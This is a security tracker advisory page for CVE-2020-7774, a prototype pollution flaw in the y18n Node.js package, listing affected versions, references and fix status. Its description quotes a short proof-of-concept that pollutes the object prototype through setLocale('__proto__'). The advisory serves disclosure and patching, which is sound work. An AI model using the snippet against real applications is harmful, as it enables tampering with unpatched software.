CVE-2020-7774

Name
CVE-2020-7774
Description
This affects the package y18n before 3.2.2, 4.0.1 and 5.0.5. PoC by po6ix: const y18n = require('y18n')(); y18n.setLocale('__proto__'); y18n.updateLocale({polluted: true}); console.log(polluted); // true
NVD Severity
high
Other trackers
CVE, NVD, CERT, CVE Details, CIRCL, Arch Linux, Debian, Red Hat, Ubuntu, Gentoo, SUSE (Bugzilla), SUSE (CVE), Mageia
Mailing lists
oss-security, full-disclosure, bugtraq
Exploits
Exploit DB, Metasploit
Forges
GitHub (code, issues), Aports (code, issues)

References

Type URI
Exploit https://github.com/yargs/y18n/issues/96
Patch https://github.com/yargs/y18n/pull/108
Exploit https://snyk.io/vuln/SNYK-JS-Y18N-1021887
Exploit https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-1038306
MISC https://www.oracle.com/security-alerts/cpuApr2021.html
Patch https://cert-portal.siemens.com/productcert/pdf/ssa-389290.pdf

Match rules

CPE URI Source package Min version Max version
cpe:2.3:a:y18n_project:y18n:*:*:*:*:*:node.js:*:* y18n >= None < 4.0.1
cpe:2.3:a:y18n_project:y18n:*:*:*:*:*:node.js:*:* y18n >= 5.0.0 < 5.0.5
cpe:2.3:a:y18n_project:y18n:*:*:*:*:*:node.js:*:* y18n >= None < 3.2.2
cpe:2.3:a:y18n_project:y18n:4.0.0:*:*:*:*:node.js:*:* y18n == None == 4.0.0

Vulnerable and fixed packages

Source package Branch Version Maintainer Status
nodejs 3.10-main 10.24.1-r0 Jakub Jirutka <jakub@jirutka.cz> fixed